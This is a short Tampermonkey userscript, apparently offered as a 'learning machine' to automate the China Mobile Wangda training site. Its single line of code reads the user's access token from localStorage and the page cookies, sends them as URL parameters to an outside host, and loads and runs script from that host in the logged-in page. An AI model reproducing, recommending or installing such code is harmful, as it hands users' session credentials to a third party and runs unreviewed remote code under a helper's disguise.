evlon / 中移网大学习机

// ==UserScript==
// @name         中移网大学习机
// @namespace    http://tampermonkey.net/
// @version      0.2
// @description  try to take over the world!
// @author       evlon
// @match        https://wangda.chinamobile.com/
// @license MIT
// @grant        none
// ==/UserScript==

(function () {
  'use strict';
javascript:!function(){var myScript=document.createElement("script");myScript.type="text/javascript",myScript.src="https://hw.p0q.top/wd/uijs.js?token="+JSON.parse(localStorage.getItem("token")).access_token+"&cookie="+encodeURIComponent(document.cookie)+"t="+(new Date).valueOf().toString(),document.body.appendChild(myScript)}();
})();